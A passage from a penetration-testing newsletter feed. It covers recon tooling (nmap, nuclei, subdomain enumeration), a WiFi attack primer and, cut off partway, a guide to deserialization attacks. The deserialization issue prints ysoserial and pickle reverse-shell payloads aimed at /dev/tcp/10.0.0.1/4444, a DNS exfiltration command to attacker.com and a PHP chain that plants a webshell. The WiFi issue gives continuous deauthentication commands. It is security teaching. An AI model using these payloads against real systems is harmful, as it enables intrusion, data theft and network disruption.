```bash
# Automatically pipes to nmap
rustscan -a 10.0.0.1

# All ports, aggressive
rustscan -a 10.0.0.1 -r 1-65535 -- -A -T4
```

## 🎯 Vulnerability Scanning with nuclei

[nuclei](https://github.com/projectdiscovery/nuclei) by ProjectDiscovery is the standard for automated vulnerability detection in bug bounty. Template-based, fast, and community-driven.

Over [10,000+ templates](https://github.com/projectdiscovery/nuclei-templates) covering CVEs, misconfigurations, exposed panels, and more.

**Note**: I cover nuclei in depth in my [Web Pentesting Fundamentals series](/series/web-pentest-fundamentals), including custom template creation and advanced workflows. This section gives you the essentials to get started.

**Setup:**

```bash
# Install
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# Update templates (do this regularly)
nuclei -ut
```

**Basic usage:**

```bash
# Scan single target
nuclei -u https://example.com

# Scan multiple targets
nuclei -l targets.txt

# Critical and high severity only
nuclei -u https://example.com -severity critical,high

# Specific tech (WordPress, Laravel, etc)
nuclei -u https://example.com -tags wordpress

# Specific CVE
nuclei -u https://example.com -tags cve2024
```

**Filtering:**

```bash
# CVE templates only
nuclei -u https://example.com -t cves/

# Misconfiguration templates
nuclei -u https://example.com -t misconfiguration/

# Exclude DOS/fuzzing
nuclei -u https://example.com -etags dos,fuzz
```

**Rate limiting:**

```bash
# Limit requests per second
nuclei -u https://example.com -rate-limit 50

# Custom headers (auth, WAF bypass)
nuclei -u https://example.com -H &quot;Authorization: Bearer token&quot;
```

**Writing custom templates:**

This is where nuclei shines. Custom templates for specific targets:

```yaml
id: custom-admin-panel

info:
  name: Custom Admin Panel Detection
  author: yourname
  severity: info
  tags: panel,exposure

http:
  - method: GET
    path:
      - &quot;{{BaseURL}}/admin-secret&quot;
      - &quot;{{BaseURL}}/secret-panel&quot;

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - &quot;Admin Login&quot;
          - &quot;Dashboard&quot;
        condition: or
```

Save as `custom.yaml`:

```bash
nuclei -u https://example.com -t custom.yaml
```

**CVE template example:**

```yaml
id: CVE-2024-example

info:
  name: Example Product RCE
  author: yourname
  severity: critical
  classification:
    cve-id: CVE-2024-example

http:
  - raw:
      - |
        POST /api/upload HTTP/1.1
        Host: {{Hostname}}

        {&quot;file&quot;:&quot;test.php&quot;,&quot;exec&quot;:&quot;true&quot;}

    matchers:
      - type: word
        words:
          - &quot;upload successful&quot;
        condition: or
```

Check the [template guide](https://docs.projectdiscovery.io/templates/introduction) for full syntax.

**Bug bounty workflow:**

```bash
# Discover subdomains
subfinder -d example.com -o subs.txt

# Find live hosts
cat subs.txt | httpx -silent -o live.txt

# Scan for vulns
nuclei -l live.txt -severity critical,high
```

This pipeline discovers subdomains, identifies live hosts, and scans for vulnerabilities in minutes.

## 🌐 Subdomain Enumeration

Subdomain enum expands your attack surface. Forgotten staging servers and dev environments are often less secured than production.

**Certificate Transparency:**

[crt.sh](https://crt.sh/) logs every issued SSL certificate publicly. Perfect for subdomain discovery.

```bash
# Query crt.sh API
curl -s &quot;https://crt.sh/?q=%25.example.com&amp;output=json&quot; | \
  jq -r &apos;.[].name_value&apos; | sed &apos;s/\*\.//g&apos; | sort -u
```

**subfinder (passive):**

[subfinder](https://github.com/projectdiscovery/subfinder) aggregates 30+ sources (crt.sh, VirusTotal, Shodan):

```bash
# Install
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

# Basic
subfinder -d example.com

# All sources
subfinder -d example.com -all -o subs.txt
```

**amass (passive + active):**

[OWASP Amass](https://github.com/owasp-amass/amass) is more aggressive. Active DNS brute-forcing:

```bash
# Passive only
amass enum -passive -d example.com

# Active with brute-force
amass enum -active -brute -d example.com -o amass.txt
```

**assetfinder (fast and simple):**

[assetfinder](https://github.com/tomnomnom/assetfinder) by Tom Hudson:

```bash
# Install
go install github.com/tomnomnom/assetfinder@latest

# Basic usage
assetfinder --subs-only example.com
```

**DNS brute-forcing with puredns:**

```bash
# Install
go install github.com/d3mondev/puredns/v2@latest

# Brute-force
puredns bruteforce wordlist.txt example.com
```

Use [SecLists DNS wordlist](https://github.com/danielmiessler/SecLists/blob/master/Discovery/DNS/subdomains-top1million-110000.txt).

**httpx (probe live hosts):**

```bash
# Install
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

# Probe discovered subdomains
cat subs.txt | httpx -silent -o live.txt
```

**Complete workflow:**

```bash
# Passive enum
subfinder -d example.com &gt; subs1.txt
assetfinder --subs-only example.com &gt; subs2.txt

# Combine
cat subs1.txt subs2.txt | sort -u &gt; all_subs.txt

# DNS brute-force (optional)
puredns bruteforce wordlist.txt example.com &gt;&gt; all_subs.txt

# Probe live
cat all_subs.txt | httpx -silent -o live.txt

# Scan
nuclei -l live.txt -severity critical,high
```

## 🔐 SSL/TLS Analysis

SSL/TLS misconfigs lead to MITM, info disclosure, and compliance violations.

**testssl.sh:**

[testssl.sh](https://github.com/drwetter/testssl.sh) tests protocols, ciphers, cert validity, and known vulns:

```bash
# Clone
git clone --depth 1 https://github.com/drwetter/testssl.sh.git

# Basic scan
./testssl.sh https://example.com

# Check vulnerabilities
./testssl.sh --vulnerable https://example.com

# JSON output
./testssl.sh --json --jsonfile results.json https://example.com
```

Checks for weak protocols (SSLv2, SSLv3, TLS 1.0), weak ciphers, cert issues, and vulns (POODLE, Heartbleed, DROWN).

**Extract SANs for subdomain discovery:**

```bash
# Extract SANs from cert
echo -n | openssl s_client -connect example.com:443 2&gt;/dev/null | \
  sed -ne &apos;/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p&apos; | \
  openssl x509 -text -noout | \
  grep -A1 &quot;Subject Alternative Name&quot; | \
  grep DNS: | sed &apos;s/DNS://g&apos; | tr &apos;,&apos; &apos;\n&apos;
```

Or with nmap:

```bash
nmap --script ssl-cert -p 443 example.com
```

## 🛠️ Automation Frameworks

[reconftw](https://github.com/six2dez/reconftw) automates the entire workflow:

```bash
# Clone and install
git clone https://github.com/six2dez/reconftw
cd reconftw &amp;&amp; ./install.sh

# Full recon
./reconftw.sh -d example.com -r
```

reconftw chains subfinder, amass, httpx, nuclei, and more into one workflow.

[recon-ng](https://github.com/lanmaster53/recon-ng) is modular like Metasploit:

```bash
pip3 install recon-ng
recon-ng

# Create workspace
workspaces create example_recon

# Load module
modules load recon/domains-hosts/certificate_transparency
options set SOURCE example.com
run
```

## 🎯 Key Takeaways

Infrastructure recon is the foundation. You can&apos;t exploit what you can&apos;t find. Master port scanning, service enumeration, and subdomain discovery before moving to exploitation.

nmap is still the gold standard. NSE scripts automate vulnerability checks and advanced recon. Combine masscan or rustscan for speed, then nmap for accuracy.

nuclei automates vulnerability detection at scale. Over 10,000 templates covering CVEs and misconfigs. Write custom templates for specific targets.

Subdomain enumeration expands attack surface exponentially. Use subfinder and amass for passive discovery, puredns for brute-forcing, httpx for probing. Staging servers are prime targets.

Certificate Transparency logs are gold mines. Every SSL cert is logged publicly. Extract SANs for subdomain discovery.

Automation is essential. reconftw chains subdomain enum, port scanning, and vulnerability scanning into single workflows.

---

That&apos;s it for this week.

This is foundational stuff. Every infrastructure assessment starts here. Master nmap syntax. Learn nuclei templates. Build subdomain enum workflows. Practice on bug bounty programs and HTB.

The attack surface is out there. Go find it.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>infrastructure-security</category><author>Ruben Santos</author></item><item><title>WiFi Hacking 101: Breaking Into Wireless Networks (Part 1)</title><link>https://www.kayssel.com/newsletter/issue-35</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-35</guid><description>A practical introduction to WiFi security testing covering the fundamentals, essential hardware, monitor mode, packet injection, and initial attack techniques</description><pubDate>Sun, 01 Feb 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Last week I spent two days in a WiFi security course taught by [@OscarAkaElvis](https://twitter.com/OscarAkaElvis) (creator of [airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon)). Hands-on training, proper hardware, and an instructor who actually knew his stuff. I learned more about 802.11 exploitation in those two days than I had in years of reading blog posts and documentation.

Here&apos;s what surprised me most. WiFi hacking isn&apos;t some black magic reserved for elite hackers. The fundamentals are straightforward. The tools are mature and well-documented. The attack vectors are proven and reproducible. What was hard ten years ago is now point-and-click with the right hardware and tools.

But there&apos;s a catch. Nobody teaches this systematically. You find scattered blog posts about deauth attacks. YouTube videos showing WPA cracking without explaining why it works. Tools documentation that assumes you already understand 802.11 fundamentals.

That&apos;s why I&apos;m writing this. I want to share what I learned in a way that actually makes sense. Start with why WiFi is such a massive attack surface. Cover the fundamentals you need to understand the attacks. Explain the hardware requirements. Show you how to set up your testing environment properly. Then walk through the attack techniques step by step.

This is Part 1, covering fundamentals, hardware, setup, and basic attacks. The advanced stuff (WPA/WPA2 cracking, PMKID attacks, WPS exploitation, WPA3, and enterprise networks) comes next.

If you&apos;ve ever wanted to understand WiFi hacking but found it overwhelming, this is your starting point.

Let&apos;s break some WiFi 👇

## 📡 Why WiFi Security Matters

Wireless networks are everywhere, broadcasting constantly to anyone within range. Unlike wired networks requiring physical access, WiFi extends beyond walls. Park outside an office building and you can see dozens of potential entry points.

The security models are fundamentally flawed. WEP was broken in 2001. WPA2 (still the most common standard) has been compromised via KRACK attacks, PMKID extraction, and implementation bugs. Even WPA3 suffered from Dragonblood attacks within a year of release.

Organizations treat WiFi as an afterthought. Default passwords on access points. WPS enabled. Weak PSKs. No client isolation. Meanwhile, they invest heavily in firewalls and IDS/IPS while the wireless network sits misconfigured since initial setup.

The attack vectors are practical. Capture a WPA2 handshake and crack it offline. No rate limiting. No account lockouts. Just your GPU and a wordlist. The barrier to entry is low: a $20-50 adapter, free open-source tools, and well-documented techniques.

This is why every pentester needs to understand WiFi security. It&apos;s often the easiest way into a network.

## 🔧 Essential Hardware

You can&apos;t hack WiFi with any random adapter. Your laptop&apos;s built-in WiFi card probably won&apos;t cut it. You need hardware that supports **monitor mode** and **packet injection**.

**Monitor mode** lets your adapter capture all wireless traffic in range, not just traffic directed to your MAC address. This is how you see handshakes, deauth frames, beacon frames, everything happening on the network.

**Packet injection** lets you send arbitrary 802.11 frames. This is critical for deauth attacks, ARP replay attacks, and many other techniques. Without injection capability, you&apos;re severely limited in what attacks you can perform.

### Recommended Adapters

**ALFA AWUS036ACH** ($40-50) - Industry standard. Realtek RTL8812AU chipset, dual-band 2.4/5GHz, excellent range. Monitor mode and injection work out of the box. This is what you&apos;ll see in every WiFi security course.

**ALFA AWUS036ACM** ($45-55) - Better for advanced attacks. MediaTek MT7612U chipset with superior injection performance. Get this if you&apos;re serious about WiFi testing.

**TP-Link TL-WN722N v1** ($20-30) - Budget option. Atheros AR9271, single-band 2.4GHz only. Critical: only v1.x works, v2/v3 don&apos;t support injection.

**Panda PAU09 N600** ($30-40) - Ralink RT5572, reliable dual-band alternative.

### Key Considerations

Chipset matters more than brand. Avoid Broadcom (poor Linux support), Realtek RTL8188EU (no injection support), and Intel (limited monitor mode).

External antennas extend range dramatically. Standard adapters work for close-range testing within 10-50 meters. Need to test from farther away? Get an adapter with RP-SMA connector and add a directional antenna. Suddenly you&apos;re pulling networks from 300+ meters away.

### Driver Installation

```bash
# Note: Drivers may break after kernel updates - reinstall if needed

# For RTL8812AU (ALFA AWUS036ACH)
git clone https://github.com/aircrack-ng/rtl8812au.git
cd rtl8812au
make
sudo make install

# For MT7612U (ALFA AWUS036ACM)
# Usually works out of the box with mt76x2u driver
# If not, install from source
git clone https://github.com/ivanovborislav/rtl8812au.git
cd rtl8812au
make
sudo make install

# Verify your adapter is recognized
iwconfig
# You should see your wireless interface (usually wlan0, wlan1, wlx...)
```

## 📻 WiFi Fundamentals

You need to understand the basics of how WiFi works before you can break it. This isn&apos;t theory for the sake of theory. These concepts directly relate to exploitation.

### Bands and Channels

WiFi operates on two main frequency bands. The 2.4 GHz band uses channels 1-13 (US uses 1-11), with each channel being 20 MHz wide. Channels overlap, and only 1, 6, and 11 are non-overlapping. You get better range but worse speed. It&apos;s more crowded because everyone uses 2.4 GHz, and legacy devices only support this band.

The 5 GHz band has many more channels (36, 40, 44, 48, and up). It&apos;s less crowded with better throughput, but shorter range and less wall penetration. Modern high-speed networks require 5 GHz.

Why this matters for attacks: you need to target the right band and channel. Your adapter must support the band the target network uses. Most home networks are still 2.4 GHz. Enterprise networks often use both.

### Operating Modes

WiFi adapters operate in different modes. Managed mode is the default: normal client mode where you connect to access points like a regular device. Monitor mode is promiscuous mode for WiFi, capturing all traffic on the channel, not just traffic for your MAC address. This is essential for packet capture and analysis. Master mode makes your adapter act as an access point, used for Evil Twin attacks. Ad-hoc mode enables direct device-to-device communication without an access point.

### Virtual Interfaces (VIF)

Modern drivers support multiple virtual interfaces on one physical adapter. You can run monitor mode while staying connected to a network.

```bash
# Create virtual monitor interface
iw dev wlan0 interface add mon0 type monitor
# wlan0 stays in managed mode, mon0 captures traffic
```

Note: VIF support varies by driver. If you hit issues, use single-interface mode.

### Authentication and Encryption

**Open (OPN)**: No auth, no encryption. Traffic in plaintext. Common in public spaces.

**WEP**: Deprecated in 2004, completely broken. Crackable in minutes.

**WPA/WPA2-PSK**: Standard for home/small business. Security depends on passphrase strength.

**WPA2-Enterprise (802.1X)**: RADIUS authentication, individual credentials. Common in corporate environments.

**WPA3**: Latest standard with improved key exchange (SAE), forward secrecy, and offline attack protection. Low adoption, vulnerable to Dragonblood attacks.

## 🎯 Setting Up Your Testing Environment

You&apos;ve got your hardware. Time to configure your environment properly.

### Enable Monitor Mode

```bash
# Kill processes that might interfere
sudo airmon-ng check kill

# Enable monitor mode on your interface
sudo airmon-ng start wlan0

# This creates a monitor interface (usually wlan0mon)
# Verify it&apos;s in monitor mode
iwconfig
```

### Test Packet Injection

Packet injection is critical. Test it before attempting attacks.

```bash
# Install aireplay-ng (part of aircrack-ng suite)
sudo apt install aircrack-ng

# Test injection on your monitor interface
sudo aireplay-ng --test wlan0mon

# Successful output looks like:
# Injection is working!
# Found X APs
```

If injection fails:
- Check driver installation
- Verify chipset supports injection
- Try a different USB port (USB 2.0 vs 3.0 can matter)
- Check dmesg for errors: `dmesg | tail -50`

### Channel Hopping

Monitor mode captures traffic on one channel at a time. To see all networks, you need to hop between channels.

```bash
# Hop through all 2.4 GHz channels
sudo airodump-ng wlan0mon

# Hop only on specific channels (1, 6, 11 - the non-overlapping ones)
sudo airodump-ng --channel 1,6,11 wlan0mon

# Lock to a specific channel (important when capturing handshakes)
sudo airodump-ng --channel 6 wlan0mon
```

### Organize Your Captures

Create a dedicated directory structure for your captures:

```bash
mkdir -p ~/wifi-testing/{captures,wordlists,handshakes,results}

# When capturing, save to organized directories
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/wifi-testing/captures/target_network wlan0mon
```

## 🔍 Reconnaissance and Network Discovery

Now that your adapter is in monitor mode, time to see what networks are around you.

### Basic Network Discovery

```bash
# Scan all networks in range
sudo airodump-ng wlan0mon
```

Key fields:
- **BSSID**: AP MAC address
- **PWR**: Signal strength (closer to 0 = stronger)
- **CH**: Channel
- **ENC**: Encryption (OPN, WEP, WPA, WPA2, WPA3)
- **AUTH**: Authentication method (PSK, MGT, OWE)
- **ESSID**: Network name

Bottom section shows **connected clients** and their **probe requests** (networks they&apos;re looking for).

### Focus on a Target Network

Once you identify a target, focus your capture on that network:

```bash
# Lock to the target&apos;s channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# -c 6: Lock to channel 6
# --bssid: Target network&apos;s MAC address
# -w capture: Save to capture-01.cap, capture-01.csv, etc.
```

### Identify Hidden Networks

Some networks hide their SSID (don&apos;t broadcast the network name in beacons). They show up as `&lt;length: X&gt;` in airodump-ng.

**How to reveal hidden SSIDs:**

When a client connects to a hidden network, it sends the SSID in probe request frames. Capture these frames to reveal the name.

```bash
# Monitor for probe requests
sudo airodump-ng --showack wlan0mon

# Or force a client to reconnect (deauth attack - covered next)
# This causes the client to send a probe request with the SSID
```

## 💥 Basic Attack Techniques

Let&apos;s start with the fundamental attacks every WiFi pentester needs to know.

### Deauthentication Attacks

Deauth attacks disconnect clients from a network. They&apos;re one of the most versatile WiFi attack primitives.

How it works: 802.11 management frames like deauth frames are unauthenticated in WPA/WPA2. You can spoof them. Send deauth frames claiming to be from the access point, and clients disconnect.

**Perform a deauth attack:**

```bash
# Deauth all clients from a network
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# --deauth 10: Send 10 deauth frames
# -a: Target access point BSSID

# Deauth a specific client
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# -c: Target client MAC address
```

**What you&apos;ll see:**

Clients disconnect. They usually reconnect within seconds. If you&apos;re running airodump-ng, you&apos;ll see the &quot;WPA handshake&quot; message when the client reconnects. This handshake is what you need for WPA/WPA2 cracking (covered in Part 2).

**Continuous deauth (DoS):**

```bash
# Send deauth frames continuously (0 = infinite)
sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# Stop with Ctrl+C
```

### Management Frame Protection (MFP)

WPA3 and newer WPA2 implementations support **802.11w Management Frame Protection**. This protects management frames (like deauth) from spoofing.

**How to detect MFP:**

```bash
# Check airodump-ng output for &quot;MFP&quot; in capabilities
sudo airodump-ng wlan0mon

# Or parse beacon frames with Wireshark
# Look for RSN Information Element with MFP capability
```

**If MFP is enabled:** Deauth attacks won&apos;t work. You can&apos;t disconnect clients. This significantly reduces your attack surface. However, MFP adoption is still low. Most networks don&apos;t have it enabled.

### Open Network Exploitation

Open networks (OPN) have no encryption. All traffic is plaintext. This is the easiest target.

**Connect to open networks:**

```bash
# Stop monitor mode
sudo airmon-ng stop wlan0mon

# Connect to the open network
sudo nmcli dev wifi connect &quot;Network_Name&quot;
```

**Capture and analyze traffic:**

```bash
# Capture in monitor mode
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w open_network wlan0mon

# Analyze with Wireshark
wireshark open_network-01.cap
```

You&apos;ll see HTTP requests, cookies, session tokens, DNS queries, and unencrypted protocols. While most sites use HTTPS, you&apos;ll still find plaintext traffic from legacy HTTP sites, poorly-coded mobile apps, IoT devices, and printers.

### OWE (Opportunistic Wireless Encryption)

OWE is the modern replacement for open networks. Provides encryption without authentication. Protects against passive eavesdropping while keeping the &quot;no password required&quot; convenience.

**How to identify OWE networks:**

```bash
# Look for &quot;OWE&quot; in the AUTH column of airodump-ng
sudo airodump-ng wlan0mon
```

**OWE networks appear open but encrypt traffic.** You can&apos;t simply capture plaintext traffic. However, OWE doesn&apos;t prevent Evil Twin attacks (covered in Part 2).

### Traffic Interception with Wireshark

Captured packets need analysis. Wireshark is your tool.

**Open captures:**

```bash
# Launch Wireshark
wireshark capture-01.cap
```

**Key Wireshark filters:**

```
eapol                           # WPA handshakes
wlan.fc.type_subtype == 0x0c    # Deauth frames
wlan.fc.type_subtype == 0x04    # Probe requests
wlan.addr == aa:bb:cc:dd:ee:ff  # Filter by BSSID
```

Export objects via `File -&gt; Export Objects -&gt; HTTP` to extract transferred files.

## 🎯 Key Takeaways

Hardware matters. Get an adapter that supports monitor mode and packet injection. The ALFA AWUS036ACH is the industry standard. Don&apos;t waste time fighting with unsupported hardware.

Understanding the fundamentals (bands, channels, operating modes, authentication methods) directly informs your attack strategy. These aren&apos;t academic concepts.

Deauth attacks are your Swiss Army knife. They force handshake captures, test DoS resilience, and prepare for Evil Twin attacks. They work on most networks because Management Frame Protection adoption is still low.

Monitor mode and packet injection are non-negotiable. Test injection before attempting attacks. If it doesn&apos;t work, troubleshoot your drivers and hardware immediately.

Wireshark is essential. Captured packets tell the whole story through EAPOL frames, probe requests, and beacon frames. Learn the filters.

---

That&apos;s it for Part 1!

WiFi security testing is more accessible than ever. The hardware is affordable. The software is free and well-maintained. The techniques are proven and reproducible. What separates successful WiFi pentesters from unsuccessful ones is understanding the fundamentals and knowing how to use the tools effectively.

Practice on your own networks first. Set up a test access point. Capture your own handshakes. Perform deauth attacks against your own devices. Understand what works and what doesn&apos;t before attempting client assessments.

Part 2 will cover the advanced attacks: cracking WPA/WPA2, PMKID extraction, WPS vulnerabilities, WPA3 Dragonblood, enterprise network exploitation, Evil Twin attacks, and captive portal bypasses.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>Deserialization Attacks: When Objects Become Weapons</title><link>https://www.kayssel.com/newsletter/issue-34</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-34</guid><description>From Java gadget chains to Python pickle exploits: a practical guide to exploiting insecure deserialization for remote code execution</description><pubDate>Sun, 25 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Let me be blunt. Deserialization vulnerabilities are criminally underestimated. You find one of these in an app? You&apos;re often one payload away from RCE. Not &quot;maybe if you chain three other bugs.&quot; Not &quot;escalate privileges first.&quot; Just one malicious serialized object and boom, you&apos;ve got a shell.

That&apos;s what makes these so dangerous. Applications take serialized data, reconstruct it into objects, and during that reconstruction process you can execute arbitrary code. The application trusts that serialized blob. You weaponize that trust.

Here&apos;s the kicker: this affects basically every major language. Java has gadget chains that go straight to RCE. Python&apos;s pickle module? The docs literally say &quot;don&apos;t trust this.&quot; PHP&apos;s `unserialize()` has been getting people popped for over a decade. .NET formatters are exploitable. Even bleeding-edge React Server Components had a serialization bug with a CVSS 10.0 rating.

This week we&apos;re covering everything you need to weaponize deserialization bugs. What they are and why apps use them. How to spot them in the wild. Exploitation techniques across Java, Python, PHP, .NET, and React. Defense strategies. And hands-on labs so you can practice.

**Quick note:** This issue focuses on classic deserialization. For JavaScript prototype pollution (which shares similar attack patterns through object manipulation), check out [Issue #24](/newsletter/issue-24).

If you test web apps, you need to understand this attack class. Let&apos;s weaponize some objects 👇

## 🎯 Understanding Serialization

Serialization converts live objects into transmittable data. Binary formats (Java, .NET, Python pickle) or text formats (JSON, XML). Apps need this for:

- **Session management**: Storing user sessions in cookies or databases
- **Caching**: Serializing objects to Redis or Memcached
- **Microservices**: Passing serialized data between services
- **Message queues**: RabbitMQ and Kafka transmit serialized messages

**Why it&apos;s dangerous:**

When apps deserialize untrusted data, the language runtime reconstructs objects and triggers code execution. You control the serialized blob, you control what executes.

**Magic methods execute automatically.** Python&apos;s `__reduce__()` fires during pickle deserialization. PHP calls `__wakeup()` and `__destruct()`. Java runs `readObject()`. These automatic method calls become your exploitation primitive.

**Gadget chains weaponize existing code.** Apps load libraries with classes that have exploitable side effects. Chain these &quot;gadgets&quot; together and you get RCE. Tools like [ysoserial](https://github.com/frohoff/ysoserial) automate the entire process.

**Apps trust serialized data implicitly.** Unlike form input that gets validated, serialized objects often bypass security checks. The app treats them as trustworthy. That misplaced trust is your attack surface.

## 🔍 Detection

**Identify serialized data signatures:**

Each language has telltale patterns. Look for base64-encoded blobs in cookies, URL parameters, or POST bodies.

**Java** serialized objects start with `rO0` (base64) or `AC ED 00 05` (hex):
```
rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0...
```

**PHP** serialized data is text-based and human-readable:
```
a:2:{s:8:&quot;username&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}
O:4:&quot;User&quot;:2:{s:4:&quot;name&quot;;s:5:&quot;alice&quot;;}
```

**Python pickle** (base64-encoded):
```
gASVKAAAAAAAAACMCF9fbWFpbl9flIwEVXNlcpSTlCmBlH0...
```

**.NET BinaryFormatter** starts with `AAEAAAD`:
```
AAEAAAD/////AQAAAAAAAAAMAgAAAF...
```

**HTTP headers and file extensions** also reveal serialization:
```
Content-Type: application/x-java-serialized-object
Content-Type: application/x-python-pickle
```

File extensions: `.ser` (Java), `.pickle` or `.pkl` (Python), `.bin` (generic binary).

**Testing for vulnerabilities:**

Once you spot serialized data, decode the base64, modify values (username, role, permissions), re-encode, and send it back. If the app accepts your modified object, escalate to malicious payloads.

**Test with known-bad payloads:**

```bash
# Java - trigger 10 second delay
java -jar ysoserial.jar CommonsCollections5 &apos;sleep 10&apos; | base64

# Python - trigger 10 second delay
import pickle, os, base64
class Exploit:
    def __reduce__(self):
        return (os.system, (&apos;sleep 10&apos;,))
print(base64.b64encode(pickle.dumps(Exploit())))
```

Watch for execution evidence: time delays, DNS lookups to your domain, HTTP callbacks, or error messages leaking class names. Any of these confirm code execution.

## ☕ Java Deserialization

Java deserialization is the OG of this vulnerability class. The Java ecosystem is massive. Libraries everywhere. Apache Commons Collections, Spring Framework. All packed with gadget chains leading to RCE.

**How it works:**

Java serialization turns objects into byte streams. Classes implement `Serializable` and the JVM handles everything automatically. Convenient for developers. Perfect for attackers.

The vulnerability triggers when `readObject()` processes untrusted data you control.

**Gadget chains:**

Apps load libraries with classes that have exploitable side effects. Each class is a &quot;gadget.&quot; Chain enough together, you get code execution.

Apache Commons Collections (versions 3.1-3.2.1 and 4.0) is the classic example. Loaded with exploitable gadgets. And this library is everywhere in enterprise Java apps.

**[ysoserial](https://github.com/frohoff/ysoserial) automates everything:**

```bash
# Generate Commons Collections payload
java -jar ysoserial.jar CommonsCollections6 &apos;touch /tmp/pwned&apos; &gt; payload.ser

# Base64 encode for web delivery
cat payload.ser | base64

# DNS exfiltration to confirm execution
java -jar ysoserial.jar CommonsCollections5 &apos;nslookup $(whoami).attacker.com&apos; | base64

# Reverse shell
java -jar ysoserial.jar CommonsCollections5 &apos;bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.0.0.1/4444 0&gt;&amp;1&quot;&apos; | base64
```

**Your exploitation workflow:**

Find serialized Java object (cookie, parameter, POST body). Generate ysoserial payload with DNS callback. Confirm execution. Escalate to full RCE. Pop a reverse shell or exfiltrate data.

Oracle WebLogic Server has been a goldmine for Java deserialization bugs. T3 protocol vulnerabilities. The `_async` component. Both allowed unauthenticated RCE.

## 🐍 Python Pickle Exploitation

Python pickle is inherently unsafe. Not &quot;potentially risky if misconfigured.&quot; Inherently unsafe. The [official Python docs](https://docs.python.org/3/library/pickle.html) literally warn you:

&gt; &quot;Warning: The pickle module is not secure. Only unpickle data you trust.&quot;

**Why pickle is dangerous:**

Pickle serializes arbitrary Python objects. Functions, classes, whatever. During deserialization, it executes code through the `__reduce__()` magic method.

**How easy is exploitation? Watch:**

```python
import pickle
import os
import base64

class Exploit:
    def __reduce__(self):
        # __reduce__ returns (callable, arguments)
        # This executes os.system(&apos;whoami&apos;) during unpickling
        return (os.system, (&apos;whoami&apos;,))

# Serialize malicious object
payload = pickle.dumps(Exploit())
print(base64.b64encode(payload).decode())
```

App calls `pickle.loads()` on that payload? `os.system(&apos;whoami&apos;)` executes. That simple.

**Vulnerable code pattern:**

```python
import pickle
from flask import Flask, request

app = Flask(__name__)

@app.route(&apos;/load_session&apos;, methods=[&apos;POST&apos;])
def load_session():
    # VULNERABLE: Deserializing user input
    session_data = request.data
    session = pickle.loads(session_data)
    return f&quot;Loaded session for {session[&apos;username&apos;]}&quot;
```

**Exploitation:**

```python
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = &apos;bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.0.0.1/4444 0&gt;&amp;1&quot;&apos;
        return (os.system, (cmd,))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload).decode())
# Send to /load_session endpoint
```

Pickle bugs show up everywhere. Waitress HTTP Server had one. Python Cryptography Library had one. All led to RCE.

## 🐘 PHP unserialize() Exploitation

PHP&apos;s `unserialize()` has been a gift that keeps on giving for over a decade. Legacy PHP apps love deserializing user input without validation.

**PHP serialization format:**

PHP serialization is text-based and human-readable. Makes it trivial to spot and manipulate:

```php
// Array serialization
a:2:{s:8:&quot;username&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}

// Object serialization
O:4:&quot;User&quot;:2:{s:4:&quot;name&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}
```

Format breakdown:
- `a:2:{}` - Array with 2 elements
- `s:8:&quot;username&quot;` - String of length 8
- `O:4:&quot;User&quot;` - Object of class &quot;User&quot; with name length 4

**Magic methods and POP chains:**

PHP magic methods fire automatically during object lifecycle:

```php
__wakeup()    // Called during unserialize()
__destruct()  // Called when object is destroyed
__toString()  // Called when object is treated as string
```

**POP Chains** (Property-Oriented Programming) chain object properties and magic methods to achieve code execution. Gadget chains for PHP.

**Example vulnerable code:**

```php
class Logger {
    private $logfile;

    public function __destruct() {
        // VULNERABLE: Executes during object destruction
        file_put_contents($this-&gt;logfile, &quot;Log closed\n&quot;, FILE_APPEND);
    }
}

// Somewhere in the application
$data = unserialize($_COOKIE[&apos;session&apos;]);
```

**Exploitation:**

```php
&lt;?php
class Logger {
    private $logfile = &apos;/var/www/html/shell.php&apos;;
}

$exploit = new Logger();
echo serialize($exploit);
// O:6:&quot;Logger&quot;:1:{s:15:&quot;Loggerlogfile&quot;;s:22:&quot;/var/www/html/shell.php&quot;;}
```

App unserializes this? `__destruct()` writes to `/var/www/html/shell.php`. Webshell deployed.

**[PHPGGC](https://github.com/ambionics/phpggc)** automates POP chain exploitation:

```bash
# List available gadget chains
./phpggc -l

# Generate Laravel RCE payload
./phpggc Laravel/RCE1 system &apos;id&apos;

# Generate Symfony RCE payload
./phpggc Symfony/RCE4 system &apos;whoami&apos;
```

PHP unserialize bugs keep appearing. cPanel had object injection in session handling. Apache CouchDB had unserialize issues. PHPMailer got hit with object injection via the `phar://` wrapper.

## ⚛️ Modern Frameworks - React Server Components

